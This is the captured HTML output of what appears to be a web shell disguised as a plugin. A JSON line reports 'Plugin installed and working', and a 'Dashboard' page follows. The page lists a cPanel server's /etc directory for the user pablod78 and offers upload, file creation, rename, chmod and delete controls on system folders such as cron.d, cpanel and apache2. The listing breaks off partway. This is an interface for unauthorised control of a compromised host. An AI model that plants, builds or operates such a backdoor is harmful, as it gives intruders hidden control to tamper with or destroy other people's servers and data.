{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-08-20 10:51:11"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fetc">etc</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
                        <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <table class="file-table">
                <thead><tr><th>Name</th><th>Size</th><th>Permissions</th><th>Modified</th><th>Actions</th></tr></thead>
                <tbody id="file-list">
                                            <tr><td colspan="5"><a href="?p=%2F" class="folder-link">📂 Parent Directory</a></td></tr>
                                                                <tr data-name="imagemagick-6">
                            <td><a href="?p=%2Fetc%2FImageMagick-6" class="folder-link">📁 ImageMagick-6</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-28 03:16</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/ImageMagick-6','ImageMagick-6')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ImageMagick-6','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ImageMagick-6',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="imagemagick-7">
                            <td><a href="?p=%2Fetc%2FImageMagick-7" class="folder-link">📁 ImageMagick-7</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-28 03:26</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/ImageMagick-7','ImageMagick-7')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ImageMagick-7','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ImageMagick-7',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="networkmanager">
                            <td><a href="?p=%2Fetc%2FNetworkManager" class="folder-link">📁 NetworkManager</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-04 22:07</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/NetworkManager','NetworkManager')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/NetworkManager','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/NetworkManager',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="upower">
                            <td><a href="?p=%2Fetc%2FUPower" class="folder-link">📁 UPower</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/UPower','UPower')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/UPower','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/UPower',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="x11">
                            <td><a href="?p=%2Fetc%2FX11" class="folder-link">📁 X11</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2024-11-18 19:21</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/X11','X11')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/X11','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/X11',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="alloy">
                            <td><a href="?p=%2Fetc%2Falloy" class="folder-link">📁 alloy</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0770</span></td>
                            <td>2026-04-16 02:21</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/alloy','alloy')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/alloy','0770')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/alloy',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="alsa">
                            <td><a href="?p=%2Fetc%2Falsa" class="folder-link">📁 alsa</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/alsa','alsa')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/alsa','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/alsa',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="alternatives">
                            <td><a href="?p=%2Fetc%2Falternatives" class="folder-link">📁 alternatives</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-11-18 09:35</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/alternatives','alternatives')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/alternatives','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/alternatives',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="apache2">
                            <td><a href="?p=%2Fetc%2Fapache2" class="folder-link">📁 apache2</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-13 03:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/apache2','apache2')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/apache2','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/apache2',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="audit">
                            <td><a href="?p=%2Fetc%2Faudit" class="folder-link">📁 audit</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0750</span></td>
                            <td>2026-04-04 20:12</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/audit','audit')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/audit','0750')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/audit',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="authselect">
                            <td><a href="?p=%2Fetc%2Fauthselect" class="folder-link">📁 authselect</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-03-12 14:22</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/authselect','authselect')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/authselect','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/authselect',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="auto.master.d">
                            <td><a href="?p=%2Fetc%2Fauto.master.d" class="folder-link">📁 auto.master.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-04 22:11</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/auto.master.d','auto.master.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/auto.master.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/auto.master.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="bash_completion.d">
                            <td><a href="?p=%2Fetc%2Fbash_completion.d" class="folder-link">📁 bash_completion.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-19 17:20</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/bash_completion.d','bash_completion.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/bash_completion.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/bash_completion.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="binfmt.d">
                            <td><a href="?p=%2Fetc%2Fbinfmt.d" class="folder-link">📁 binfmt.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-06-25 00:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/binfmt.d','binfmt.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/binfmt.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/binfmt.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="chkconfig.d">
                            <td><a href="?p=%2Fetc%2Fchkconfig.d" class="folder-link">📁 chkconfig.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-03-12 10:43</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/chkconfig.d','chkconfig.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/chkconfig.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/chkconfig.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="chkserv.d">
                            <td><a href="?p=%2Fetc%2Fchkserv.d" class="folder-link">📁 chkserv.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/chkserv.d','chkserv.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/chkserv.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/chkserv.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cifs-utils">
                            <td><a href="?p=%2Fetc%2Fcifs-utils" class="folder-link">📁 cifs-utils</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-23 19:31</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cifs-utils','cifs-utils')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cifs-utils','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cifs-utils',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cl.selector">
                            <td><a href="?p=%2Fetc%2Fcl.selector" class="folder-link">📁 cl.selector</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-18 03:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cl.selector','cl.selector')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cl.selector','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cl.selector',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="clamd.d">
                            <td><a href="?p=%2Fetc%2Fclamd.d" class="folder-link">📁 clamd.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-09 00:54</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/clamd.d','clamd.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/clamd.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/clamd.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cloud">
                            <td><a href="?p=%2Fetc%2Fcloud" class="folder-link">📁 cloud</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:24</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cloud','cloud')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cloud','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cloud',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="collectd.d">
                            <td><a href="?p=%2Fetc%2Fcollectd.d" class="folder-link">📁 collectd.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-15 03:39</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/collectd.d','collectd.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/collectd.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/collectd.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="conntrackd">
                            <td><a href="?p=%2Fetc%2Fconntrackd" class="folder-link">📁 conntrackd</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/conntrackd','conntrackd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/conntrackd','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/conntrackd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="container">
                            <td><a href="?p=%2Fetc%2Fcontainer" class="folder-link">📁 container</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/container','container')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/container','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/container',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cpanel">
                            <td><a href="?p=%2Fetc%2Fcpanel" class="folder-link">📁 cpanel</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0711</span></td>
                            <td>2026-08-20 03:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cpanel','cpanel')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cpanel','0711')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cpanel',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cron.d">
                            <td><a href="?p=%2Fetc%2Fcron.d" class="folder-link">📁 cron.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 03:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cron.d','cron.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cron.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cron.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cron.daily">
                            <td><a href="?p=%2Fetc%2Fcron.daily" class="folder-link">📁 cron.daily</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-05 17:20</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cron.daily','cron.daily')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cron.daily','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cron.daily',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cron.hourly">
                            <td><a href="?p=%2Fetc%2Fcron.hourly" class="folder-link">📁 cron.hourly</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-19 17:20</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cron.hourly','cron.hourly')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cron.hourly','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cron.hourly',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cron.monthly">
                            <td><a href="?p=%2Fetc%2Fcron.monthly" class="folder-link">📁 cron.monthly</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2022-04-11 19:54</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cron.monthly','cron.monthly')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cron.monthly','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cron.monthly',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="cron.weekly">
                            <td><a href="?p=%2Fetc%2Fcron.weekly" class="folder-link">📁 cron.weekly</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2022-04-11 19:54</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/cron.weekly','cron.weekly')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/cron.weekly','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/cron.weekly',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="crypto-policies">
                            <td><a href="?p=%2Fetc%2Fcrypto-policies" class="folder-link">📁 crypto-policies</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-05 00:31</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/crypto-policies','crypto-policies')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/crypto-policies','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/crypto-policies',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="datacycle">
                            <td><a href="?p=%2Fetc%2Fdatacycle" class="folder-link">📁 datacycle</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-22 18:33</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/datacycle','datacycle')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/datacycle','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/datacycle',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dbus-1">
                            <td><a href="?p=%2Fetc%2Fdbus-1" class="folder-link">📁 dbus-1</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-02-25 15:27</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/dbus-1','dbus-1')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dbus-1','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dbus-1',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dconf">
                            <td><a href="?p=%2Fetc%2Fdconf" class="folder-link">📁 dconf</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/dconf','dconf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dconf','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dconf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="debuginfod">
                            <td><a href="?p=%2Fetc%2Fdebuginfod" class="folder-link">📁 debuginfod</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-05-27 09:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/debuginfod','debuginfod')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/debuginfod','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/debuginfod',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="default">
                            <td><a href="?p=%2Fetc%2Fdefault" class="folder-link">📁 default</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-23 16:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/default','default')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/default','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/default',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="depmod.d">
                            <td><a href="?p=%2Fetc%2Fdepmod.d" class="folder-link">📁 depmod.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-11-18 09:34</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/depmod.d','depmod.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/depmod.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/depmod.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dhcp">
                            <td><a href="?p=%2Fetc%2Fdhcp" class="folder-link">📁 dhcp</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0750</span></td>
                            <td>2026-04-09 06:48</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/dhcp','dhcp')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dhcp','0750')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dhcp',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dib-manifests">
                            <td><a href="?p=%2Fetc%2Fdib-manifests" class="folder-link">📁 dib-manifests</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-02-25 15:31</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/dib-manifests','dib-manifests')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dib-manifests','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dib-manifests',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dnf">
                            <td><a href="?p=%2Fetc%2Fdnf" class="folder-link">📁 dnf</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/dnf','dnf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dnf','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dnf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dovecot">
                            <td><a href="?p=%2Fetc%2Fdovecot" class="folder-link">📁 dovecot</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-19 20:38</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/dovecot','dovecot')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dovecot','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dovecot',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dpkg">
                            <td><a href="?p=%2Fetc%2Fdpkg" class="folder-link">📁 dpkg</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-03-23 13:44</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/dpkg','dpkg')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dpkg','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dpkg',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="dracut.conf.d">
                            <td><a href="?p=%2Fetc%2Fdracut.conf.d" class="folder-link">📁 dracut.conf.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-14 00:41</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/dracut.conf.d','dracut.conf.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/dracut.conf.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/dracut.conf.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="egl">
                            <td><a href="?p=%2Fetc%2Fegl" class="folder-link">📁 egl</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 07:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/egl','egl')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/egl','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/egl',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="environment-modules">
                            <td><a href="?p=%2Fetc%2Fenvironment-modules" class="folder-link">📁 environment-modules</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-21 09:06</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/environment-modules','environment-modules')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/environment-modules','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/environment-modules',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="exports.d">
                            <td><a href="?p=%2Fetc%2Fexports.d" class="folder-link">📁 exports.d</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-08 16:14</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/exports.d','exports.d')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/exports.d','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/exports.d',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="firebird">
                            <td><a href="?p=%2Fetc%2Ffirebird" class="folder-link">📁 firebird</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-04-17 16:36</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/firebird','firebird')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/firebird','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/firebird',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="firewall">
                            <td><a href="?p=%2Fetc%2Ffirewall" class="folder-link">📁 firewall</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-01 15:13</td>
                            <td><div class="actions">
                                <button onclick="showRename('/etc/firewall','firewall')" class="action-button">Rename</button>
